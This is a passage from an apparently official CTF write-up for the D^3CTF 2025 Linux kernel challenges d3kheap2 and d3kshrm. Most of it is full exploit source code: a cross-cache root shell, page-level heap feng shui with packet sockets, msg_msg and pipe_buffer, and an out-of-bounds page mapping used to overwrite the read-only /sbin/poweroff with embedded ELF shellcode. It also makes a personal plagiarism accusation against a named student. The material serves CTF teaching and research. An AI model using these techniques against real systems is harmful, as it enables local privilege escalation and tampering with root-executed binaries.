        msg_buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE
    );

    setresuid(0, 0, 0);
    setresgid(0, 0, 0);

    /* get_root_shell() spawns the shell and never returns */
    get_root_shell();
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kheap2 --------") "\n"
    INFO_MSG("--------    Official Exploitation   --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
    banner();
    exploit();
    return 0;
}

What’s more…

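The challenge description is adapted from the lyrics of 7years, once my favorite song (although I was 15 years old at the time), because it often reminds me of my teenage years. I hope it also reminds everyone how far Linux kernel exploitation has come since d3kheap in D^3CTF 2022 ( ~~although the two things do not seem to be related~~ ). With the stunning cross-cache attack we can exploit almost every UAF and DF vulnerability by migrating a SLUB page from one kmem_cache to another, which is why I named this challenge d3kheap2: a solution upgrade from the limited one for d3kheap's easy double free to the general one for d3kheap2's lunatic double free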

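Although the core technique of this challenge is not very new in 2025 (it had already been proposed by 2022, though I do not know whether that was the earliest), cross-cache attacks have not been common in CTFs over the past few years. That is why I chose to showcase the technique in this year's D^3CTF: I was rather busy in 2024, and in 2023 I showcased something else (which, in my view, was plagiarized a year later by a student named 胡嘉懿 who had taken part in D^3CTF 2023 and who then took it to BlackHat USA 2024; daring to present at BlackHat something almost identical to 👴's blog is, to me, truly shameless)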

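Another reason I chose the cross-cache attack is that I really did not have much time to finish these challenges. Since I had already graduated, I was not following how my juniors were preparing this year's D^3CTF, and only about 10 days before the competition did I learn that there were almost no pwn challenges yet. I therefore had to rush this year's Pwn challenges with almost no new research results in mind, to make sure the competition could be held as in previous years. I am very sorry that I could not bring something as cool as d3kcache from 2023 this year. Fortunately, I still prepared some special gifts for you, namely my little tricks for playing with msg_msg and pipe_buffer: tricky but useful gadgets you may fall in love with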

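Also, if you are careful enough, you may notice that this challenge does not enable CONFIG_SLAB_BUCKETS (a mitigation against heap spraying) as d3kshrm does. Bypassing it by replacing precise object allocation with a full-scale heap spray is not hard, but given that this year's D^3CTF lasted only 24h, I still wanted this challenge to be a relatively easy sign-in for the "Pwn" category, just as the description of d3kheap in D^3CTF 2022 said. This challenge was therefore not originally designed to be very hard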

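As for the final results, the vast majority of players used the intended cross-cache attack. I am very happy to see that most CTFers in the competition have mastered this advanced technique, which can be applied to almost any heap vulnerability. With cross-cache attacks having been widely used in recent years, I am convinced that they will become, or already have become, a basic step or standard entry point of today's Linux kernel exploitation. Regrettably, I forgot to enable CONFIG_MEMCG to separate GFP_KERNEL and GFP_KERNEL_ACCOUNT objects: as you can see, I used a very complicated multi-stage technique manipulating msg_msg and pipe_buffer, yet some players could simply use sk_buff to read and write the UAF pipe_buffer. Another regret is that team We_0wn_y0u, who took first blood, solved only d3kheap2 in D^3CTF 2025 and then left, so I do not know their exact solution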

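Now let us look at state-of-the-art academic techniques such as Dirty PageTable (SLUBStick; I do not know why there are two names, nor am I sure whether the authors are the same, because the original Dirty Pagetable blog seems to have been removed and I do not have time to tell them apart for now) and DirtyPage (which its authors also call Page Spray). The underlying technique in every case is the cross-cache attack: are they powerful enough to apply to this challenge? The answer seems to be "not that easily", because each was designed for a different vulnerability pattern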

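For SLUBStick, we need the capability to perform several additional UAF writes, which requires constructing complicated multi-stage cross-cache page frees and reclaims; this raises the difficulty of building the exploit while lowering its usability and stability
DirtyPage says it "goes one step further" by confusing the object count of a SLUB (see Figure 1: Page Spray Exploit Model for Double Free.), but overwriting an object that has no functionality is pointless. In my view it may be better suited to attacking kernel objects with specific functionality (for example file or pipe_buffer?); if the target object lacks sufficient capabilities for the later attack stages, such an exploit may not be applicable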

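Therefore, in my view the plain cross-cache attack is a better fit for d3kheap2, but in any case, thanks to them for developing such powerful exploitation techniques and broadening our horizons to another level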

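Another point is that auxiliary techniques such as Pspray, which predict SLUB page allocation through a timing side channel, seem to be of little use for general kernel heap exploitation beyond d3kheap2. A core reason is that with mitigations such as CONFIG_RANDOM_KMALLOC_CACHES landing in the mainline kernel, whether a new SLUB page has been allocated no longer matters that much to us, because our objects are always allocated at random from different isolated pools, so massive heap spraying combined with approximate estimation seems to be the only feasible approach. Although d3kheap2 does not enable this mitigation, I still wanted to talk about something related to real-world exploitation, and I hope you don't mind :)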

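Although I still have a lot to say about Linux kernel exploitation, the article already seems too long at this point, so let's stop here. In any case, I want to thank every contestant who took part in this CTF and tried to solve the challenge, whether or not you got the flag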

0x02. D3KSHRM | 1 Solve

You know what? Sharing is always a good moral quality. That’s the reason why I’m going to share some of my precious memories with all of you!

Copyright(c) 2025 <ディーキューブ・シーティーエフカーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

You can get the original attachment at https://github.com/arttnba3/D3CTF2025_d3kshrm.

Introduction

This challenge provides a kernel module named d3kshrm.ko , which lets users create shared memory. Through ioctl() we have the following capabilities:

Create a new shared memory of a specific size
Bind to an existing shared memory
Unbind from the current shared memory
Delete an existing shared memory

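To access this memory, we can mmap() the corresponding file descriptor after binding, and this is where the vulnerability lies: due to the lack of a proper range check on d3kshrm::pages , an attacker can treat the 8 bytes adjacent to d3kshrm::pages as a struct page pointer and map it into the user address space: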

static vm_fault_t d3kshrm_vm_fault(struct vm_fault *vmf)
{
    struct d3kshrm_struct *d3kshrm;
    struct vm_area_struct *vma;
    vm_fault_t res;

    vma = vmf->vma;
    d3kshrm = (struct d3kshrm_struct *) vma->vm_private_data;

    spin_lock(&d3kshrm->lock);

    /* vulnerability here */
    // if (vmf->pgoff >= d3kshrm->page_nr) {
    if (vmf->pgoff > d3kshrm->page_nr) {
        res = VM_FAULT_SIGBUS;
        goto ret;
    }

    get_page(d3kshrm->pages[vmf->pgoff]);
    vmf->page = d3kshrm->pages[vmf->pgoff];
    res = 0;

ret:
    spin_unlock(&d3kshrm->lock);

    return res;
}
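The off-by-one is easy to miss, so here is a tiny userland model of the two comparisons (not kernel code; both function names are made up for illustration). With a `pages` array of `page_nr` entries, the valid indices are `0 .. page_nr - 1`, and the buggy check additionally lets `pgoff == page_nr` through, which is exactly the slot right after the array:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Model of the check in the challenge: only rejects pgoff > page_nr. */
static bool buggy_check_passes(size_t pgoff, size_t page_nr)
{
    return !(pgoff > page_nr);
}

/* Model of the commented-out check: rejects pgoff >= page_nr. */
static bool fixed_check_passes(size_t pgoff, size_t page_nr)
{
    return !(pgoff >= page_nr);
}
```

For a 512-entry array, index 512 passes the buggy check and is rejected by the fixed one, while index 513 is rejected by both.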

Exploitation

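Since d3kshrm::pages is allocated from an isolated kmem_cache , we have to use page-level heap feng shui to manipulate page-level memory so that we can map page pointers that lie outside the challenge's own functionality. Because of the reference counting, we cannot achieve a page-level double free by simply mapping the same page twice, so the strategy available to us is to map a page that we only have read permission on into user space as writable. This reminds us of CVE-2023-2008 , which likewise used an out-of-bounds page mapping to carry out a Dirty Pipe-like attack. Our exploitation strategy is therefore as follows: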

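Use page-level heap feng shui to rearrange page-level memory so that the SLUB page of the challenge's isolated kmem_cache is placed between two SLUB pages of the target object. Here we choose pipe_buffer as the target object, because its structure starts with a struct page pointer, which allows us to do the oob mapping
Open a read-only file and use the splice() system call to put its first page into a pipe_buffer
Use the vulnerability to do the oob mapping, so that a page we only have read permission on is mapped into user space as readable and writable, which lets us modify the read-only file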
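The second step of the strategy above can be sketched in isolation as follows. This is a minimal illustration, assuming a regular file on a filesystem that supports splice(); `splice_first_page()` is a hypothetical helper name and not part of the official exploit, which does the same thing in bulk in its `splice_pipe()`:

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Splice up to one page from the start of a file opened read-only into
 * a pipe. No data is copied: the pipe_buffer ends up referencing the
 * file's page cache page. Returns the number of bytes spliced, or -1.
 */
static ssize_t splice_first_page(const char *path, int pipe_fd[2])
{
    loff_t offset = 0;
    ssize_t nr;
    int fd;

    fd = open(path, O_RDONLY);
    if (fd < 0) {
        return -1;
    }

    nr = splice(fd, &offset, pipe_fd[1], NULL, 0x1000, 0);
    close(fd);

    return nr;
}
```

After this call the first pipe_buffer of the pipe holds a `struct page` pointer to the file's page, which is what the oob mapping later picks up.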

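I eventually chose /sbin/poweroff (which links to busybox) as the target file, because the last line of /etc/init.d/rcS executes /sbin/poweroff as root, which lets us execute arbitrary code with root privileges. The final exploit is shown below. It has a success rate of about 84.63% (measured over more than 2048 automated local runs), and I am sure there is room to optimize it to 95%+, since I did not use more sophisticated page-level feng shui tricks: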

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(SUCCESS_MSG("[*] Process binded to core ") "%d\n", core);
}

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

int get_msg_queue(void)
{
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
    #define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

int unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        log_error("[x] Unable to create new namespace for PGV subsystem");
        return -EPERM;
    }

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    return 0;
}

/**
 * pgv pages sprayer related 
 * note that we should create two processes:
 * - the parent is the one to send cmd and get root
 * - the child creates an isolated namespace by calling unshare_setup(),
 *      receiving cmd from the parent and only operating on it
**/

#define PGV_SOCKET_MAX_NR 1024
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

enum {
    PGV_CMD_ALLOC_SOCKET,
    PGV_CMD_ALLOC_PAGE,
    PGV_CMD_FREE_PAGE,
    PGV_CMD_FREE_SOCKET,
    PGV_CMD_EXIT,
};

enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_packet_socket()
{
    int socket_fd;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
        ret = socket_fd;
        goto err_out;
    }

    return socket_fd;

err_out:
    return ret;
}

int alloc_socket_pages(int socket_fd, unsigned int size, unsigned nr)
{
    struct tpacket_req req;
    int version, ret;

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, 
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

int free_socket_pages(int socket_fd)
{
    struct tpacket_req req;
    int ret;
    
    memset(&req, 0, sizeof(req));
    req.tp_block_size = 0x3361626e;
    req.tp_block_nr = 0;
    req.tp_frame_size = 0x74747261;
    req.tp_frame_nr = 0;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_SOCKET_MAX_NR];
    int ret;

    /* create an isolated namespace */
    if (unshare_setup()) {
        err_exit("FAILED to initialize PGV subsystem for page spraying!");
    }

    memset(socket_fd, 0, sizeof(socket_fd));

    /* handler request */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        switch (req.cmd) {
        case PGV_CMD_ALLOC_SOCKET:
            if (socket_fd[req.idx] != 0) {
                printf(ERROR_MSG("[x] Duplicate idx request: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = create_packet_socket();
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed at allocating packet socket"));
                break;
            }

            socket_fd[req.idx] = ret;
            ret = 0;

            break;
        case PGV_CMD_ALLOC_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = alloc_socket_pages(socket_fd[req.idx], req.size, req.nr);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to alloc packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = free_socket_pages(socket_fd[req.idx]);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to free packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_SOCKET:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            /* report the result and mark the slot as unused again */
            ret = close(socket_fd[req.idx]);
            socket_fd[req.idx] = 0;

            break;
        case PGV_CMD_EXIT:
            log_info("[*] PGV child exiting...");
            ret = 0;
            break;
        default:
            printf(
                ERROR_MSG("[x] PGV child got unknown command : ")"%d\n",
                req.cmd
            );
            ret = -EINVAL;
            break;
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != PGV_CMD_EXIT);
}

void prepare_pgv_system(void)
{
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);
    
    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
        /* the child must not fall through into the parent's exploit flow */
        exit(EXIT_SUCCESS);
    }
}

int create_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int destroy_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

/**
 * Challenge Interface
**/

#define CMD_CREATE_D3KSHRM    0x3361626e
#define CMD_DELETE_D3KSHRM    0x74747261
#define CMD_SELECT_D3KSHRM    0x746e6162
#define CMD_UNBIND_D3KSHRM    0x33746172

#define MAX_PAGE_NR 0x100

int chal_fd;

int d3kshrm_create(int fd, unsigned long page_nr)
{
    return ioctl(fd, CMD_CREATE_D3KSHRM, page_nr);
}

int d3kshrm_delete(int fd, unsigned long idx)
{
    return ioctl(fd, CMD_DELETE_D3KSHRM, idx);
}

int d3kshrm_select(int fd, unsigned long idx)
{
    return ioctl(fd, CMD_SELECT_D3KSHRM, idx);
}

int d3kshrm_unbind(int fd)
{
    return ioctl(fd, CMD_UNBIND_D3KSHRM);
}

/**
 * Exploitation procedure
**/

#define PIPE_SPRAY_NR 126

int prepare_pipe(int pipe_fd[PIPE_SPRAY_NR][2])
{
    int err;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if ((err = pipe(pipe_fd[i])) < 0) {
            printf(
                ERROR_MSG("[x] failed to alloc ")"%d"ERROR_MSG(" pipe!\n"), i
            );
            return err;
        }
    }

    return 0;
}

int expand_pipe(int pipe_fd[PIPE_SPRAY_NR][2], size_t size)
{
    int err;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if ((err = fcntl(pipe_fd[i][1], F_SETPIPE_SZ, size)) < 0) {
            printf(
                ERROR_MSG("[x] failed to expand ")"%d"ERROR_MSG(" pipe!\n"), i
            );
            return err;
        }
    }

    return 0;
}

ssize_t splice_pipe(int pipe_fd[PIPE_SPRAY_NR][2], int victim_fd)
{
    ssize_t err;
    loff_t offset;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        offset = 0;
        if ((err = splice(victim_fd,&offset,pipe_fd[i][1],NULL,0x1000,0)) < 0) {
            printf(
                ERROR_MSG("[x] failed to splice ")"%d"ERROR_MSG(" pipe!\n"),i
            );
            return err;
        }
    }

    return 0;
}

#define PBF_SZ_PAGE_NR (0x1000 / 8)

uint8_t shellcode[] = {
    /* ELF header */

    // e_ident[16]
    0x7f, 0x45, 0x4c, 0x46, /* Magic number "\x7fELF" */
    0x02,   /* ELF type: 64-bit */
    0x01,   /* ELF encode: LSB */
    0x01,   /* ELF version: current */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* Reserve */
    // e_type: ET_EXEC
    0x02, 0x00,
    // e_machine: AMD x86-64
    0x3e, 0x00,
    // e_version: 1
    0x01, 0x00, 0x00, 0x00,
    // e_entry: 0x0000000000400078
    0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_phoff: 0x40
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_shoff: 0
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_flags: 0
    0x00, 0x00, 0x00, 0x00,
    // e_ehsize: 0x40
    0x40, 0x00,
    // e_phentsize: 0x38
    0x38, 0x00,
    // e_phnum: 1
    0x01, 0x00,
    // e_shentsize: 0
    0x00, 0x00,
    // e_shnum: 0
    0x00, 0x00,
    // e_shstrndx: 0
    0x00, 0x00,

    /* Program Header Table[0] */

    // p_type: PT_LOAD
    0x01, 0x00, 0x00, 0x00,
    // p_flags: PF_R | PF_W | PF_X
    0x07, 0x00, 0x00, 0x00,
    // p_offset: 0
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_vaddr: 0x0000000000400000
    0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_paddr: 0x0000000000400000
    0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_filesz: 0xD5
    0xD5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_memsz: 0xF2
    0xF2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_align: 0x1000
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

    /* Sections[0]: Shellcode */

    // opening "/flag" and read

    // xor rax, rax
    0x48, 0x31, 0xc0,
    // push rax
    0x50,
    // movabs rax, 0x67616c662f # "/flag"
    0x48, 0xb8, 0x2f, 0x66, 0x6c, 0x61, 0x67, 0x00, 0x00, 0x00,
    // push rax
    0x50,
    // mov rax, 0x02
    0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00,
    // mov rdi, rsp
    0x48, 0x89, 0xe7,
    // xor rsi, rsi
    0x48, 0x31, 0xf6,
    // syscall
    0x0f, 0x05,
    // mov rdi, rax
    0x48, 0x89, 0xc7,
    // xor rax, rax
    0x48, 0x31, 0xc0,
    // sub rsp, 0x100
    0x48, 0x81, 0xec, 0x00, 0x01, 0x00, 0x00,
    // mov rsi, rsp
    0x48, 0x89, 0xe6,
    // mov rdx, 0x100
    0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
    // mov rax, 0x1
    0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,
    // mov rdi, 0x1
    0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,
    // mov rsi, rsp
    0x48, 0x89, 0xe6,
    // mov rdx, 0x100
    0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
    // xor rdi, rdi
    0x48, 0x31, 0xff,
    // mov rax, 0x3c
    0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
};

#define PAGE8_SPRAY_NR 0x100

int prepare_pgv_pages(void)
{
    int err;    /* avoid shadowing the errno macro from <errno.h> */

    for (int i = 0; i < PAGE8_SPRAY_NR; i++) {
        if ((err = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            return err;
        }

        if ((err = alloc_page(i, 0x1000 * 8, 1)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            return err;
        }
    }

    return 0;
}

#define MSG_QUEUE_NR 0x100
#define MSG_SPRAY_NR 2

int prepare_msg_queue(int msqid[MSG_QUEUE_NR])
{
    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((msqid[i] = get_msg_queue()) < 0) {
            printf(
                ERROR_MSG("[x] Unable to create ")"%d"ERROR_MSG(" msg_queue\n"),
                i
            );
            return msqid[i];
        }
    }

    return 0;
}

int spray_msg_msg(int msqid[MSG_QUEUE_NR])
{
    char buf[0x2000];
    int err;

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            if ((err = write_msg(msqid[i],buf,0xF00,0x3361626e74747261+i)) < 0){
                return err;
            }
        }
    }

    return 0;
}

#define D3KSHRM_SLUB_OBJ_NR 8
#define D3KSHRM_SPRAY_NR (D3KSHRM_SLUB_OBJ_NR * 2)

void exploit(void)
{
    int pipe_fd1[PIPE_SPRAY_NR][2], pipe_fd2[PIPE_SPRAY_NR][2];
    int msqid[MSG_QUEUE_NR];
    int d3kshrm_fd[D3KSHRM_SPRAY_NR], d3kshrm_idx[D3KSHRM_SPRAY_NR];
    int victim_fd;
    char *oob_buf[D3KSHRM_SPRAY_NR];
    void *victim_buf;

    log_info("[*] Preparing...");

    bind_core(0);
    prepare_pgv_system();

    victim_fd = open("/sbin/poweroff", O_RDONLY);
    if (victim_fd < 0) {
        perror("Failed to open target victim file");
        exit(EXIT_FAILURE);
    }

    log_info("[*] Allocating msg_queue for clearing kmem_cache...");
    if (prepare_msg_queue(msqid) < 0) {
        err_exit("FAILED to create msg_queue!");
    }

    log_info("[*] Allocating pipe_fd1 group...");
    if (prepare_pipe(pipe_fd1) < 0) {
        perror(ERROR_MSG("Failed to spray pipe_buffer"));
        err_exit("FAILED to prepare first part of pipes.\n");
    }

    log_info("[*] Allocating pipe_fd2 group...");
    if (prepare_pipe(pipe_fd2) < 0) {
        perror(ERROR_MSG("Failed to spray pipe_buffer"));
        err_exit("FAILED to prepare second part of pipes.\n");
    }

    log_info("[*] Preparing D3KSHRM files...");
    for (int i = 0; i < D3KSHRM_SPRAY_NR; i++) {
        if ((d3kshrm_fd[i] = open("/proc/d3kshrm", O_RDWR)) < 0) {
            perror(ERROR_MSG("Failed to open /proc/d3kshrm"));
            err_exit("FAILED to spray D3KSHRM files.\n");
        }
    }

    log_info("[*] Pre-allocating ONE SLUB pages for D3kSHRM...");
    if ((d3kshrm_idx[0] = d3kshrm_create(d3kshrm_fd[0], PBF_SZ_PAGE_NR)) < 0) {
        perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
        err_exit("FAILED to spray D3KSHRM shared memory.\n");
    }

    log_info("[*] Allocating pgv pages...");
    if (prepare_pgv_pages() < 0) {
        err_exit("FAILED to prepare pages on packet socket.\n");
    }

    log_info("[*] Clear previous redundant memory storage in kernel...");
    if (spray_msg_msg(msqid) < 0) {
        perror(ERROR_MSG("Failed to spray msg_msg"));
        err_exit("FAILED to clear reduncant kernel memory storage.\n");
    }

    log_info("[*] Spraying D3KSHRM buffer...");

    free_page((PAGE8_SPRAY_NR / 2) + 1);
    destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 1);

    for (int i = 1; i < D3KSHRM_SPRAY_NR; i++) {
        if ((d3kshrm_idx[i] = d3kshrm_create(d3kshrm_fd[i], PBF_SZ_PAGE_NR))<0){
            perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
            err_exit("FAILED to spray D3KSHRM shared memory.\n");
        }
    }

    log_info("[*] Expanding pipe_buffer...");

    free_page(PAGE8_SPRAY_NR / 2);
    destroy_pgv_socket(PAGE8_SPRAY_NR / 2);

    if (expand_pipe(pipe_fd1, 0x1000 * 64) < 0) {
        perror(ERROR_MSG("Failed to expand pipe_buffer"));
        err_exit("FAILED to expand first part of pipes.\n");
    }

    log_info("[*] Expanding pipe_buffer...");

    free_page((PAGE8_SPRAY_NR / 2) + 2);
    destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 2);

    if (expand_pipe(pipe_fd2, 0x1000 * 64) < 0) {
        perror(ERROR_MSG("Failed to expand pipe_buffer"));
        err_exit("FAILED to expand second part of pipes.\n");
    }

    log_info("[*] Splicing victim file into pipe group...");

    if (splice_pipe(pipe_fd1, victim_fd) < 0) {
        perror(ERROR_MSG("Failed to splice target fd"));
        err_exit("FAILED to splice victim file into pipe_fd1 group.\n");
    }

    if (splice_pipe(pipe_fd2, victim_fd) < 0) {
        perror(ERROR_MSG("Failed to splice target fd"));
        err_exit("FAILED to splice victim file into pipe_fd2 group.\n");
    }

    log_info("[*] Doing mmap and mremap...");

    for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
        if (d3kshrm_select(d3kshrm_fd[i], d3kshrm_idx[i]) < 0) {
            perror(ERROR_MSG("Failed to select D3KSHRM shared memory"));
            err_exit("FAILED to select D3KSHRM shared memory.\n");
        }

        oob_buf[i] = mmap(
            NULL,
            0x1000 * PBF_SZ_PAGE_NR,
            PROT_READ | PROT_WRITE,
            MAP_FILE | MAP_SHARED,
            d3kshrm_fd[i],
            0
        );
        if (oob_buf[i] == MAP_FAILED) {
            perror(ERROR_MSG("Failed to map chal_fd"));
            err_exit("FAILED to mmap chal_fd.\n");
        }

        oob_buf[i] = mremap(
            oob_buf[i],
            0x1000 * PBF_SZ_PAGE_NR,
            0x1000 * (PBF_SZ_PAGE_NR + 1),
            MREMAP_MAYMOVE
        );
        if (oob_buf[i] == MAP_FAILED) {
            perror(ERROR_MSG("Failed to mremap oob_buf area"));
            err_exit("FAILED to mremap chal's mmap area.\n");
        }
    }

